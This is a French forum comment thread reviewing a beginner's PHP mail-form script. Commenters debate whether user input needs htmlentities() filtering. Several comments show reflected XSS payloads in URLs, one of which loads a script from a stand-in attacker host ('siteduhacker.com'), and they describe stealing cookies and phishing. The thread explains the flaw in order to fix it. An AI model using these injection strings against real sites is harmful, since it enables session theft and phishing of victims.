FORMULAIRE ENVOI PAR MAIL AVEC MESSAGE D'ERREUR

Messages postés
1663
Date d'inscription
lundi 16 septembre 2002
Statut
Membre
Dernière intervention
30 juillet 2008
- - Dernière réponse : mickadevelop
Messages postés
59
Date d'inscription
mardi 15 février 2005
Statut
Membre
Dernière intervention
4 juin 2010
- 26 juin 2007 à 21:40
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/24784-formulaire-envoi-par-mail-avec-message-d-erreur

Afficher la suite 
mickadevelop
Messages postés
59
Date d'inscription
mardi 15 février 2005
Statut
Membre
Dernière intervention
4 juin 2010
-
Ok je n'avais pas pensé a ce cas de figure. Merci et donc en conclusion il faut filtrer le html(avec htmlentites)toutes les variables demandé à l'utilisateur et que l'on affiche au format html!!!!!
winwarrior
Messages postés
654
Date d'inscription
jeudi 3 avril 2003
Statut
Membre
Dernière intervention
10 février 2009
1 -
Le hacker peut inciter une personne à cliquer sur un lien (social engineering)
(exemple: http://sitevulnerable.com/?variablePasSecurisée=<script src="http://siteduhacker.com/scriptMalveillant.js"></script>);
la victime en cliquant sur le lien (le hacker l'aura bien entendu camouflé) injectera dans sa propre page le code javascript du hacker
mickadevelop
Messages postés
59
Date d'inscription
mardi 15 février 2005
Statut
Membre
Dernière intervention
4 juin 2010
-
Oui je suis entierement d'accord avec toi qu'il ne faut pas laisser le javascript actif!! mais ce raisonnement n'a de valeur uniquement si un internaute malveillant mes un codes javascript sur une pages que d'autres interanutes peuvent consulter (par exemple dans un forum). Pour le cas qui est exposé au dessus on va afficher les variables saisies par l'utilisateur temporairement sur la page et il n'y aura uniquement que l'internaute qui les aura saisies qui sera concerné par ces variables. En conséquence si il rentre du javascript il ne pourra uniquement que lire ces propres cookies ou ce rediriger que lui meme vers une autre page web. Les conséquences ne seront valable uniquement que pour l'internaute qui a saisie les variable. Donnez moi votre avis sur ce raisonnement?
winwarrior
Messages postés
654
Date d'inscription
jeudi 3 avril 2003
Statut
Membre
Dernière intervention
10 février 2009
1 -
Combiné avec du social engineering (la victime devra cliquer sur le lien),
Un hacker pourrait mettre (par exemple) un code javascript qui lui enverrait le cookie de la victime sur ce domaine, ou ouvrirait une nouvelle fenetre avec une fausse identification ebay ou paypal (fishing) etc.. on peut presque tout faire en javascript
Donc non, ça ne sert pas à rien =)
mickadevelop
Messages postés
59
Date d'inscription
mardi 15 février 2005
Statut
Membre
Dernière intervention
4 juin 2010
-
salut, ca sert à rien de mettre htmlentities() puisque si il met des balises html elle ne seront actives que pour l'utilisateur (donc que pour le mec qui les met) si il a envi d'avoir des merdes sur ca page c'est sont probleme. J'aimerais avoir votre avis sur ce sujet peut etre n'ai- je pas pensé à une faille de securité lié à du javascripte ou autre merci :)
Mascotte_Alex
Messages postés
20
Date d'inscription
samedi 25 novembre 2006
Statut
Membre
Dernière intervention
22 juin 2007
-
Bonsoir, malheureusement les infos ne sont pas envoyées de mon coté
Sauriez vous pourquoi alors que j'ai bien modifier les infos concernant :
// Sujet du mail et adresse de déstination
$recipient = "dos-santos-alex@hotmail.fr";

Merci d'avance Bonne soirée
jonathan724
Messages postés
36
Date d'inscription
dimanche 14 août 2005
Statut
Membre
Dernière intervention
4 juin 2007
-
Bizard quand j' essaye d' accéder au fichier formulaire j' obtion le message suivant :
Parse error: parse error, unexpected T_IF in /home/goldfree/www/formulaire.php on line 17

si quelqu' un pourrait m' aider ! Merci
cs_gabi77
Messages postés
4
Date d'inscription
dimanche 15 février 2004
Statut
Membre
Dernière intervention
11 avril 2006
-
Bonjour

Le script est un début, je vais bientot le modifier d'après tous vos commentaire cela ma aidé a approfondir mais connaissance. Donc voila et merci à tous les commentaires ci-dessus.

Cordialement gabi77
cs_Anthomicro
Messages postés
9440
Date d'inscription
mardi 9 octobre 2001
Statut
Membre
Dernière intervention
13 avril 2007
8 -
Salut ;-)

alternative à la gestion d'erreur via un switch : htmlentities() Comme ça les caractères html sont affichés et non interprétés par le navigateur.

Bye
cs_minta
Messages postés
30
Date d'inscription
samedi 1 février 2003
Statut
Membre
Dernière intervention
9 octobre 2007
-
Ce commentaire s'adresse à GRenard, j'aimerais recevoir ton commentaire sur la source que tu trouveras à l'adresse suivante:

<http://www.phpcs.com/code.aspx?ID=22503>
cs_chris81
Messages postés
589
Date d'inscription
jeudi 2 octobre 2003
Statut
Membre
Dernière intervention
29 avril 2008
1 -
salut,
sympa ton code par contre je crois qu'a un moment pour la gestion des champ vide tu ecrase ta reponse au fur et a mesure.
winwarrior
Messages postés
654
Date d'inscription
jeudi 3 avril 2003
Statut
Membre
Dernière intervention
10 février 2009
1 -
Pas mal mais pas sécurisé, "formulaire.php?ERRMSG=<script>alert();</script>"
à ta place j'utiliserai "switch()" pour filtrer les erreur
"formulaire.php?ERRMSG=1" etc ..
Sinon, meme avis que GRenard pour les endif et le exit

Bonne continuation.
cs_GRenard
Messages postés
1663
Date d'inscription
lundi 16 septembre 2002
Statut
Membre
Dernière intervention
30 juillet 2008
1 -
Pas mal pour un débutant par contre, c'est pas beau utiliser des endif :P mais bon tu fais comme tu veux

L'utilisation de ton exit à la fin de ton fichier result.php est a proscrire...
Même si sur les sites de php ils te disent de faire ca, ce n'est pas une bonne idée...
En plus, tu es à la fin de ton fichier, c'est completement inutile :P